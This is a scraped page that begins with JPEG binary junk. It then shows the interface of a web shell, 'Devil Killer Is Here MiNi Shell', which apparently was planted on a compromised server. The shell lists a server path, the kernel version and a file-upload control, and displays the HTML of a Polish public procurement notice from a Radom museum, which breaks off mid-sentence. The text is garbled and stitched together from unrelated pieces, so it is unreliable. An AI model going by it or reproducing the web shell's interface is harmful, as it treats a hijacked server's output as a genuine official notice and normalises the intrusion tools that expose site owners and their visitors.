JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250207/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20250207/0009418901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dostosowanie zabudowanych nieruchomości gruntowych przy ul. Rynek 16 i Rwańska 1 w Radomiu do działalności muzealnej- etap II dokumentacja projektowo- kosztorysowa. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MUZEUM IM.JACKA MALCZEWSKIEGO W RADOMIU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000592584</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radom</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 (48) 36-243-29</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">malczewski@muzeum.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.muzeum.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostosowanie zabudowanych nieruchomości gruntowych przy ul. Rynek 16 i Rwańska 1 w Radomiu do działalności muzealnej- etap II dokumentacja projektowo- kosztorysowa. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6e7cfbea-3565-43df-bb7d-8ad9888c9f50</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00094189</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-02-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00025217/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Dostosowanie zabudowanych nieruchomości gruntowych przy ul. Rynek 16 i Rwańska 1 w Radomiu do działalności muzealnej- etap II dokumentacja projektowo-kosztorysowa.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-6e7cfbea-3565-43df-bb7d-8ad9888c9f50 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	Niniejsze postępowanie prowadzone jest w języku polskim.<br/>2.	W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu platformy e-Zamówienia, dostępnej pod adresem https://ezamowienia.gov.pl, oraz poczty elektronicznej: zamowieniapubliczne@muzeum.edu.pl (z zastrzeżeniem, że składanie ofert odbywa się wyłącznie za pośrednictwem Platformy <br/>e-Zamówienia).<br/>3.	Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>4.	Adres strony internetowej prowadzonego postępowania https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu &#34;Wykonawca&#34; na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont oraz zasady korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz w zakładce &#34;Centrum Pomocy&#34;.<br/>2.	Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>3.	Dokumenty elektroniczne lub ich cyfrowe odwzorowania muszą być sporządzone zgodnie z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>4.	Dokumenty elektroniczne, o których mowa w §2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, należy sporządzać w formatach danych określonych w rozporządzeniu Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (np. PDF, XML), uwzględniając wymagania przekazywania jako załączniki. Zamawiający dopuszcza stosowanie podpisów kwalifikowanych, podpisów zaufanych lub podpisów osobistych (zgodnie z przepisami ustawy Pzp).<br/>5.	Informacje, oświadczenia lub dokumenty inne niż wymienione w §2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, można przekazywać w postaci elektronicznej: <br/>a. W formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (np. PDF, XML) jako załączniki, <br/>b. Jako tekst wpisany bezpośrednio w treść wiadomości przesyłanej za pomocą &#34;Formularza do komunikacji&#34;.<br/>6.	Dokumenty zawierające informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz.U. z 2022 r. poz. 1233 ze zm.) Wykonawca przekazuje w wydzielonym i odpowiednio oznaczonym pliku. <br/>W nazwie pliku należy umieścić oznaczenie: &#34;Dokument stanowiący tajemnicę przedsiębiorstwa&#34;.<br/>7.	Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce &#34;Formularze&#34; na Platformie e-Zamówienia. Formularze te umożliwiają przekazywanie załączników (np. &#34;dodaj załącznik&#34;), które muszą być opatrzone wymaganym podpisem elektronicznym.<br/>8.	Możliwość korzystania z &#34;Formularzy do komunikacji&#34; w pełnym zakresie wymaga posiadania konta &#34;Wykonawcy&#34; na Platformie e-Zamówienia oraz zalogowania się na niej. Do korzystania z funkcji zadawania pytań dotyczących dokumentacji postępowania wystarczy posiadanie tzw. konta uproszczonego.<br/>9.	Wszystkie wysłane i odebrane wiadomości są widoczne w zakładce &#34;Komunikacja&#34; po zalogowaniu na Platformę e-Zamówienia.<br/>10.	Maksymalny rozmiar plików przesyłanych za pośrednictwem formularzy wynosi 25 MB. <br/>W przypadku większych plików należy podzielić je na części i przesłać w kilku wiadomościach.<br/>11.	Minimalne wymagania techniczne sprzętu oraz specyfikacja połączenia są określone w Regulaminie Platformy e-Zamówienia, dostępnym na stronie https://ezamowienia.gov.pl.<br/>12.	W przypadku problemów technicznych związanych z funkcjonowaniem Platformy e-Zamówienia, użytkownicy mogą zgłaszać problemy za pomocą formularza dostępnego na stronie internetowej w zakładce &#34;Zgłoś problem&#34; lub kontaktować się bezpośrednio z pomocą techniczną Platformy.<br/>13.	W szczególnie uzasadnionych przypadkach, gdy komunikacja za pośrednictwem Platformy e-Zamówienia jest niemożliwa, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres: zamowieniapubliczne@muzeum.edu.pl (z wyłączeniem składania ofert).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych jest Muzeum im. Jacka Malczewskiego w Radomiu z siedzibą w Radomiu, ul. Rynek 11, 26-600 Radom, dane kontaktowe Inspektora ochrony danych osobowych e-mail: iodo@muzeum.edu.pl, tel. (48) 362 21 14 wew.126.<br/>2. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego,<br/>3. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 i 2 ustawy Pzp, z tym, że udostępnienie danych, o których mowa w art. 10 RODO, może nastąpić w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w Dziale IX ustawy Pzp, do upływu terminu ich wniesienia.<br/>4. Pani/Pana dane osobowe będą przechowywane do zgodnie z kategorią archiwalną akt B5, przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia.<br/>5. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>6. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>7. Posiada Pani/Pan:<br/>– na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących, z zastrzeżeniem art. 75 ustawy Pzp ,<br/>– na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych z zastrzeżeniem art. 19 ust. 2 i art. 76 ustawy Pzp ,<br/>– na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO , oraz art. 19 ust. 3 ustawy Pzp ,<br/>– prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO,</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:<br/>– w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>– prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>– na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MJM-ZP.26.2-U-2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia:<br/>1)	Przedmiotem zamówienia jest kompleksowe opracowanie wielobranżowej dokumentacji projektowo-kosztorysowej, obejmującej m.in.:<br/>- Opracowanie trzy wariantowej koncepcji projektowej;<br/>- Inwentaryzację uzbrojenia terenu;<br/>- Uzyskanie mapy do celów projektowych;<br/>- Uzyskanie decyzji o ustaleniu lokalizacji inwestycji celu publicznego (jeżeli dotyczy);<br/>- Opracowanie projektów architektoniczno-budowlanego oraz technicznego i wykonawczych wraz z uzyskaniem niezbędnych pozwoleń, w tym pozwolenia na budowę;<br/>- Uzyskanie uzgodnień, opinii, decyzji oraz pozwoleń wymaganych przepisami prawa, w tym pozwolenia Mazowieckiego Wojewódzkiego Konserwatora Zabytków;<br/>-Wykonanie przedmiarów, kosztorysów inwestorskich oraz Szczegółowych Specyfikacji Technicznych Wykonania i Odbioru Robót Budowlanych (STWIORB);<br/>- Pełnienie nadzoru autorskiego podczas realizacji inwestycji.<br/>2)	Zakres prac dotyczy zadania inwestycyjnego pn.: „Dostosowanie zabudowanych nieruchomości gruntowych przy ul. Rynek 16 i Rwańska 1 w Radomiu do działalności muzealnej – etap II: dokumentacja projektowa”.<br/>2.2. Wymagania szczegółowe:<br/>1)	Dokumentację należy wykonać zgodnie z wytycznymi Mazowieckiego Wojewódzkiego Konserwatora Zabytków.<br/>2)	Mapy do celów projektowych oraz ekspertyzy techniczne budynków dostarczy Wykonawca.<br/>3)	Wszelkie uzgodnienia, opinie, decyzje oraz pozwolenia wymagane przepisami prawa pozostają w zakresie Wykonawcy.<br/>4)	Projekt musi uwzględniać możliwość dostosowania obiektów do potrzeb osób z niepełnosprawnościami zgodnie z ustawą o zapewnianiu dostępności.<br/>2.3. Ogólne wymagania techniczne<br/>1)	Projekt musi spełniać wymogi określone w art. 5 ust. 1 Prawa budowlanego, w tym dotyczące nośności konstrukcji, higieny, ochrony przed hałasem, oszczędności energii oraz ochrony zabytków.<br/>2)	Obiekt powinien być zaprojektowany z uwzględnieniem zintegrowanych systemów monitorowania i zarządzania (np. systemy SSWiN, monitoring wizyjny, kontrola dostępu).<br/>3)	Wszystkie instalacje (elektryczne, sanitarne, wentylacyjne) muszą uwzględniać energooszczędne rozwiązania oraz minimalizację kosztów eksploatacyjnych.<br/>4)	Szczegółowy opis przedmiotu zamówienia zawarty jest w załączniku nr 1 a-d do SWZ .<br/>3. Dodatkowe zapisy dotyczące realizacji zamówienia:<br/>1) Wszystkie wskazane materiały i urządzenia należy opisać za pomocą cech technicznych i jakościowych. Jeżeli to niemożliwe, wskazanie konkretnego producenta musi być uzupełnione zapisami &#34;lub równoważny&#34; wraz z precyzyjnym opisem, co należy rozumieć przez równoważność.<br/>2) Zamawiający nie wymaga obowiązkowej wizji lokalnej, ale zaleca Wykonawcom zapoznanie się z terenem inwestycji. Wszystkie dostępne dokumenty są udostępnione na stronie internetowej postępowania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych</p> <p class="mb-0">71245000-7 - Plany zatwierdzające, rysunki robocze i specyfikacje</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena za nadzór autorski</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby wskazanej do pełnienia funkcji architekta prowadzącego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zdolności technicznej lub zawodowej:<br/>Warunek I<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej dwa opracowania wielobranżowej dokumentacji projektowej w zakresie budowy, przebudowy lub remontu budynków o powierzchni użytkowej co najmniej 2 000 m² każdy.<br/>UWAGA:<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek musi zostać spełniony w całości przez co najmniej jednego z nich. Zamawiający nie dopuszcza sumowania doświadczenia pomiędzy Wykonawcami w tym zakresie. Analogiczne zasady dotyczą braku możliwości sumowania doświadczenia przy poleganiu na zasobach innych podmiotów.<br/>Warunek II<br/>Wykonawca musi wykazać, że w celu realizacji zamówienia dysponuje lub będzie dysponował osobami, które będą skierowane do realizacji zamówienia i posiadają kwalifikacje zawodowe, doświadczenie oraz wykształcenie odpowiednie do pełnionej funkcji. W szczególności:<br/>a) Jedna osoba pełniąca funkcję architekta prowadzącego, która wykonała w okresie ostatnich 3 lat co najmniej dwa zadania polegające na opracowaniu projektu budowlanego dotyczącego budowy, przebudowy lub remontu budynku wpisanego do rejestru zabytków oraz posiada uprawnienia architektoniczne bez ograniczeń. Zamówienia te muszą być zakończone uzyskaniem prawomocnej decyzji o pozwoleniu na budowę.<br/>b) Jedna osoba pełniąca funkcję projektanta posiadającego uprawnienia budowlane do projektowania bez ograniczeń w specjalności konstrukcyjno-budowlanej.<br/>c) Jedna osoba pełniąca funkcję projektanta posiadającego uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.<br/>d) Jedna osoba pełniąca funkcję projektanta posiadającego uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych i kanalizacyjnych.<br/>e) Jedna osoba pełniąca funkcję projektanta posiadającego uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych.<br/>UWAGA:<br/>Zamawiający wymaga, aby doświadczenie architekta prowadzącego było dokumentowane w sposób umożliwiający ocenę w ramach kryteriów oceny ofert. Wykonawcy ubiegający się o dodatkowe punkty w tym kryterium powinni załączyć odpowiedni formularz zgodny z załącznikiem nr 2 do SWZ.<br/>2.	Wykorzystanie zasobów podmiotów trzecich:<br/>Stosownie do art. 118 ustawy Pzp, Wykonawca może polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, pod warunkiem, że wykaże rzeczywisty dostęp do tych zasobów i ich wykorzystanie w trakcie realizacji zamówienia. W tym celu należy złożyć zobowiązanie podmiotu udostępniającego zasoby zgodnie z załącznikiem nr 7 do SWZ.<br/>3.	Solidarna odpowiedzialność:<br/>Wykonawca polegający na zasobach innych podmiotów odpowiada solidarnie z tymi podmiotami za szkody wynikłe z niewykonania lub nienależytego wykonania zobowiązań.<br/>4.	Wykonawcy wspólnie ubiegający się o zamówienie:<br/>Wykonawcy wspólnie ubiegający się o zamówienie powinni załączyć oświadczenie o podziale zadań między poszczególnymi członkami konsorcjum (załącznik nr 8 do SWZ). Zamawiający może zwrócić się o wyjaśnienia dotyczące faktycznego zakresu wykonywanych zadań.<br/>5.	Dokumentacja potwierdzająca spełnienie warunków:<br/>Wykonawca powinien załączyć dokumenty, takie jak referencje, umowy, protokoły odbioru, które potwierdzą spełnienie warunków udziału w postępowaniu. Zamawiający zaakceptuje wyłącznie dokumenty odnoszące się do zrealizowanych zamówień zgodnych z wymaganiami SWZ.<br/>6.	Ograniczenia w późniejszym powoływaniu się na podmioty 